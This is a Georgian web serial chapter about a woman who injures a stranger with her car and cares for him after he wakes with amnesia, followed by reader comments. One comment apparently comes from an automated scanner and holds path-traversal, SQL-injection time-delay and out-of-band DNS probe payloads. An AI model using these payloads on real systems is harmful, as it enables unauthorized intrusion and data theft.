შესვლა
რეგისტრაცია
რეკლამა

ერკე მიდასი - ორმაგი თამაში (თავი 2)


23-08-2024, 22:32
ავტორი ერკე
ნანახია 892

-მოგესალმებით, ჩაგვაწერინეთ ინფორმაცია პაციენტის. - დასჭექა ქალის მწივანა ხმამ სარეგისტრაციოში, რომელიც მშვიდი და საოცრად აუღელვებელი გახლდათ.
-გთხოვთ რამე იღონეთ, - ყვიროდა გოგო, რომელიც მწივანას მოპირდაპირედ იდგა და უბრალო ფორმების შევსებას ერჩია ნორმალური პასუხი მიეღო ექიმისგან. - თავი ძლიერ დაარტყა? მინდა ვიცოდე, პასუხისმგებლობას საკუთარ თავზე ვიღებ სრულიად.
-ჩაგვაწერინეთ ინფორმაცია პაციენტის შესახებ. - გაიმეორა იგივე ხმამ. - ექიმთან გასაუბრებასაც შეძლებთ, როგორც კი სრულიად დაათვალიერებს ბიჭს. ყველაფერი კარგად იქნება, დამშვიდდით.
-რა ჩაგაწერინოთ ქალბატონო, რა? საპატრულოს უკვე ვესაუბრე, სრულიად შემთხვევით, გაუცნობიერებლად დავეჯახე უცნობ მამაკაცს, რომლის არც სახელი ვიცი, არც გვარი და არც წარმომავლობა. რას მეკითხებით ვერ ვხვდები?
-თქვენს საკონტაქტოს და სახელ და გვარს ჩავიწერ, უბრალო რეგისტრაციის ფორმისთვის რომ დაზარალებული აქ თქვენ მოიყვანეთ.
-მია შენგელია. - ნომერს კარნახობს და თან ჰოლში იყურება, რომ რაიმეს ან ვინმეს მოჰკრას თვალი ვისგანაც ინფორმაციის გაგება შეიძლება. ჰოლში არავინ ჩანს, თუმცა იმედს არ კარგავს და როგორც კი ყველაფერი ჩაიწერა რეგისტრატორმა მაშინვე იმ კარისკენ გაიჭრა, სადაც შეიყვანეს.
„რა მჭირს? მასზე ფიქრს ვერ ვწყვეტ. - ფიქრობდა და გულში მია და შეშინებული იყურებოდა. - რა სულელი ხარ მია, ნერვიულობ და ამიტომ, ფიქრობ ადამიანი მოკალი და ნერვიულობ, არცაა გასაკვირი. არა, არა... არ უნდა მოკვდეს, მხოლოდ მცირედით დავეჯახე, მერე ლამის იმ წითელმა ოპელმაც გადაუარა, მცირედით ასცდა. ნამდვილად ბედია საჭირო რა! ან რას მიდგებოდა წინ და ქუჩის მეორე მხარეს გადასასვლელად გვერდზე არასდროს იყურება? ნუთუ თავი მოსაკლავად ემეტებოდა? ღმერთოო, უშველე...“
-ექიმო, - როგორც კი ვინმე ხალათიანი გამოდის საოპერაციოდან, მია მასთან ჩნდება. - ექიმო, ძალიან გთხოვთ მითხარით როგორ იქნება?
-მთავარ ქირურგს დაელოდეთ თუ შეიძლება. მხოლოდ სტაჟიორი ვარ. - უხეშად გასცა პასუხი ახალგაზრდა სათვალიანმა მამაკაცმა, რომლის ხალათიც ძირს ეთრეოდა ისეთი გრძელი იყო და ამ კომენტარიდან რამდენიმე წამში, სანამ დარბაზს ბოლომდე გაივლიდა და ლიფტამდე მივიდოდა ფეხებში აებლანდა.
მას შემდეგ კვლავ რამდენიმე ადამიანი გამოდის ოთახიდან, თუმცა ხმას არავინ იღებს ამის თაობაზე და ყველა ურჩევს რომ სახლში წავიდეს და დაისვენოს.
-არა! სახლში იქამდე არ წავალ, სანამ არ გავარკვევ როგორაა!
-ახლა მაინც ვერ გაარკვევთ ქალბატონო. ღრმა ნარკოზშია და თავის ტვინზე საჭირო ქმედებები ხორციელდება. სჯობს დაისვენოთ.
-თავის ტვინზეო? ასე ცუდადაა საქმე?
-ჯერ ვერაფერს მოგახსენებთ. მოდით დამშვიდდით დაისვენეთ და ხვალ მობრძანდით.
ურჩმა გოგონამ არ ათხოვა ყური არავის და სარეგისტრაციოს ჰოლში სკამზე მომლოდინეს ჩაეძინა. დილით კი უნდა წასულიყო სამუშაოდ, თუმცა მსგავს სიტუაციაში ვერსად გამოცხადდებოდა, მისი დატოვებაც რომ მოსწეოდა, სამსახურს მიატოვებდა ხოლო იმ ადამიანს, ვინც მის გამო იტანჯებოდა არა.
ოპერაციაზე პასუხისმგებელი ექიმი აღვიძებს. მია ძლივს ახელს თვალებს და მხოლოდღა მაშინ იაზრებს რომ ჩასძინებია.
-უი, უკაცრავად... - გაუბედავად ამოთქვა. - რა ისმის ახალი?
-ჯერ ისევ უგონოდაა ქალბატონო, ოპერაცია წარმატებით დასრულდა, თუმცა უნდა მოვიცადოთ სანამ დაულაგდება ყველაფერი. ცოტა ხნით აუცილებლად უნდა იწვეს.
თითქოს რაღაც ჩაენგრაო მიას, თუმცა ირგვლივ სამყარო ისევ ისე ბრუნავდა, არაფერი შეცვლილა. კვლავ ისმოდა მწივანა ხმა, რომელიც შემდეგ მომხმარებელს იხმობდა.
მეორე დილით სამსახურიდან დიდი თხოვნის შედეგად გაეთავისუფლა და კვლავ მოლოდინის რეჟიმში იყო.
-კვლავ იგივეს თქმა შემიძლია ქალბატონო.
-ხვალ... ხვალ რომ მოვიდე უკეთესობას თუ შევამჩნევ? იქნებ შემიშვათ? მისი ნახვა მინდა...
-ახლობელი ხართ მისი?
-არა... თუმცა ეს ჩემთვის მნიშვნელოვანია. ძალიან გთხოვთ. - ლამის მუხლებში ჩაუვარდა მთავარ ექიმს, რომელიც კედელთან იყო აყუდებული და ქალის ვედრებას ისმენდა. ექიმმა აქეთ-იქით გაიხედა და საბოლოოდ დათანხმდა.
ქალი ხავერდოვანი კანითა და გვირილებიანი კაბით შიგნით მოწიწებით შევიდა. ჯერ იქაურობას მოავლო თვალი შემდეგ კი მწოლიარესთან ჩაიმუხლა. თითქმის გაუთანაბრდა, მისი ხელი აიღო და პატიება სთხოვა. თვალები უმოძრაო მდგომარეობაში, არაფერს ამბობდნენ, თუმცა მია ფიქრობდა, რომ ახლა მის სხეულს, მის ხმას ღრიალი სურდა და ამოთქმა ყველაფრის რაც დაგროვებული ჰქონდა.
-ქალბატონო...
-მია.
-დოკუმენტები თან არ ჰქონია პოლიციის თქმით და ვერ აღმოაჩინეს რაიმე, რითიც მისი ვინაობის დადასტურებას შევძლებდით. უნდა ვივარაუდოთ რომ აქ არავინ მოაკითხავს და ვერავინ შეძლებს მის სახლში წაყვანას როდესაც გამოფხიზლდება. თუ თავად არ გვეტყვის თავის მისამართს.
-მესმის. არ არის პრობლემა. მას თან მე წავიყვან. მე მივხედავ, ოღონდ გამოძვრეს და გადარჩეს.
-მადლიერები ვართ თქვენი სულგრძელობისთვის.
-შესაძლოა ჰყავს კიდეც ვინმე, თუმცა ისე ეცვა მაწანწალას ჰგავდა. შემთხვევით გზაზე გადმომიჭრა რომ დავეჯახე.
-თავის ტვინის ტრავმა აქვს მიღებული, შესაძლოა რომ გაიღვიძოს არაფერი ახსოვდეს თავის ცხოვრების უახლოეს რამდენიმე წელზე, ან საერთოდ არაფერი. ამიტომ არც ის ეხსომება როგორ დაეჯახეთ თუ თქვენ არ გაახსენებთ მას. - დაამშვიდა ექიმმა თუმცა ეს მიას გულს უფრო ხვდებოდა, ვიდრე დამამშვიდებელ სიტყვებად აღქმაა.
-მან უნდა იცოდეს ვინ მიიყვანა ამ მდგომარეობამდე, მე თავად ვეტყვი, მადლობა ყურადღებისთვის. - ექიმმა დატოვა პალატა, სადაც ოპერაციის შემდგომ გადაიყვანეს, ხოლო მია დარჩა. მისი ხელი ძლიერ ეჭირა და პატიებას ემოციურად სთხოვდა.
უეცრად მცირე მოძრაობა შენიშნა. ჯერ თითის, შემდეგ მთელი ხელის და სხეულმაც მოძრაობა დაიწყო. სასწრაფოდ გავარდა პალატიდან რომ ექიმისთვის დაეძახა და რომ დაბრუნდნენ უკვე სრულიად ფხიზლად დახვდათ, საწოლზე წამომჯდარი უაზროდ მზირალი ცდილობდა გაეგო სად იყო.
-სად ვარ? რა მოხდა?
-ავარიაში მოყევი. - დაიწყო ექიმმა.
-მე დაგეჯახე, სრულიად შემთხვევით. - შეუსწორა მიამ.
-რა? ამის დრო არ მაქვს, ახლავე სახლში უნდა წავიდე. - თქვა მან და ფეხზე წამოდგომა სცადა. უეცრად წაბარბაცდა და ექიმის ხელი რომ არა, დაეცემოდა. ექიმმა, დაიჭირა და შეეცადა კვლავ მიეყვანა საწოლამდე.
-ჯერ არ უნდა ადგეთ. სუსტად ხართ.
-სახლში... - ცოტა ხნით გაჩუმდა და იქ მყოფთ გადაავლო თვალი, მზერა ავეჯზე გადაიტანა და მიხვდა რომ არ ხუმრობდნენ, საავადმყოფოს კედლებში იყო გამოკეტილი და ფეხზე ადგომაც უჭირდა. - სად მაქვს სახლი?
-არ გახსოვს? - შეშინდა მია.
-არა. არაფერი მახსოვს. რატომ მაცვია ეს ბინძური სამოსი, რა ხდება?
-ქუჩაში ფეხით მოდიოდი, ბარბაცებდი, დიდი ალბათობით ნასვამი იყავი და ამ ტანსაცმელში, მე რომ ქუჩისკენ შემოვუხვიე უეცრად ბარბაცით ისე რომ აზრზე მოსვლა ვერ მოვასწარი შუა გზისკენ გამოვარდი და მუხრუჭისთვის ფეხის დადგმა ვერ შევძელი დროულად. ძალიან ჩქარაც არ მოვდიოდი, თუმცა თავი ძლიერად დაარტყი როგორც ექიმმა მითხრა ტვინის დაზიანება გაქვს.
-მაშინ შენი ბრალი არ ყოფილა. - სერიოზულად შეეპასუხა დაშავებული. - და თქვენ? არ იცით ვინ ვარ?
-სამწუხაროდ არა, მეგობარო. - დაიწყო ექიმმა. - ვერანაირი საბუთი ვერ აღმოგიჩინეთ თან. არც პასპორტი, არც პირადობა, არანაირი ფურცელიც კი სადაც რაიმე სახელი გვარი ეწერებოდა, თუნდაც ახლობელი პირის. სრულიად ცარიელი იყავით.
-სამწუხაროა. - ამოთქვა უცნობმა მამაკაცმა და მიას მიაპყრო მზერა. - ახლა რა უნდა ვქნა.
-სახლში წაგიყვანთ და იქამდე მოგაქცევთ ყურადღებას, სანამ არ გამოჯანმრთელდებით და ყველაფერი არ გაგახსენდებათ.
-ეს თქვენთვის დიდი მსხვერპლის გაღება იქნება, რისთვისაც მადლობელი ვარ თუმცა არაა საჭირო.
-ვიცი. უბრალოდ ასე გადავწყვიტე და შენ კი არა, მამა ზეციერიც რომ დამიდგეს წინ ის ვერ შემაცვლევინებს აზრს.
-მაშინ ხელები ამიწევია. - გაიღიმა მან და მიამ გაიფიქრა, რა საოცარი ღიმილი აქვს.


.................
მცირე თავია, მართალია, მაგრამ აქ იკვრება კვანძი და ამის შემდეგ უფრო დიდ თავს შემოგთავაზებთ საინტერესო და უკეთესი რამეებით. ვინც კითხულობთ გამომეხმაურეთ... რომ გავიგო რა მოგეწონათ ან ღირს თუ არა გაგრძელება საერთოდ.



№1 სტუმარი სტუმარი ანი

საინტერესოა, ველი გაგრძელებას, თავების მოცულობა ცოტა გაზარდეთ.

 


№2  offline ახალბედა მწერალი ერკე

სტუმარი ანი
საინტერესოა, ველი გაგრძელებას, თავების მოცულობა ცოტა გაზარდეთ.

დიდი მადლობა. კი გავზრდი აუცილებლად. პატარა თავების წერა მეც არ მიყვარს უბრალოდ ეს თავი სხვაგვარად არ გამოდიოდა. მადლობა შეფასებისთვის. heart_eyes
--------------------
თავს ღმერთად
შემოქმედად
ვგრძნობ,
როცა კალამს ხელში
ვიღებ.

 


№3 სტუმარი pHqghUme

rzxfZLzD: KlmDjKpK

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

%2fetc%2fpasswd

gethostbyname(lc('hityw'.'ysodpsgq05658.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(77).chr(121).chr(71)

/../../../../../../../../../../boot.ini

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

555-1; waitfor delay '0:0:15' --

555-1 waitfor delay '0:0:15' --

555cxhUx4dh'; waitfor delay '0:0:15' --

555-1) OR 121=(SELECT 121 FROM PG_SLEEP(15))--

555UkLMb1Qs') OR 990=(SELECT 990 FROM PG_SLEEP(15))--

 


№4 სტუმარი Елка

Карги историаа сиамовнебит вкитхулоб. Мадлоба.

 


№5  offline ახალბედა მწერალი ერკე

Елка
Карги историаа сиамовнебит вкитхулоб. Мадлоба.

უღრმესი მადლობა
--------------------
თავს ღმერთად
შემოქმედად
ვგრძნობ,
როცა კალამს ხელში
ვიღებ.

 


№6  offline წევრი Linda Gavasheli

რა იყო ახლა ეს, ამ დროს გაწყვეტა იქნებოდა?! ????????
მართალია ჯერ ვერ გავიგე ნიკო რა კაცია, მაგრამ საინტერესოდ კი დაიწყო ამბავი ♥️????

 


№7  offline ახალბედა მწერალი ერკე

Linda Gavasheli
რა იყო ახლა ეს, ამ დროს გაწყვეტა იქნებოდა?! ????????
მართალია ჯერ ვერ გავიგე ნიკო რა კაცია, მაგრამ საინტერესოდ კი დაიწყო ამბავი ♥️????

ხოდა მასე! ხვალ დაიდება ახალი თავი და ელოდეთ kissing_heart
--------------------
თავს ღმერთად
შემოქმედად
ვგრძნობ,
როცა კალამს ხელში
ვიღებ.

 


№8 სტუმარი სტუმარი მაკო

სავარაუდოდ ეს კაცი ნიკო იქნება არა? ძალუან საინტერესო და განსხვავებულია

 



სახელი: *
  • bowtiesmilelaughingblushsmileyrelaxedsmirk
    heart_eyeskissing_heartkissing_closed_eyesflushedrelievedsatisfiedgrin
    winkstuck_out_tongue_winking_eyestuck_out_tongue_closed_eyesgrinningkissingstuck_out_tonguesleeping
    worriedfrowninganguishedopen_mouthgrimacingconfusedhushed
    expressionlessunamusedsweat_smilesweatdisappointed_relievedwearypensive
    disappointedconfoundedfearfulcold_sweatperseverecrysob
    joyastonishedscreamtired_faceangryragetriumph
    sleepyyummasksunglassesdizzy_faceimpsmiling_imp
    neutral_faceno_mouthinnocent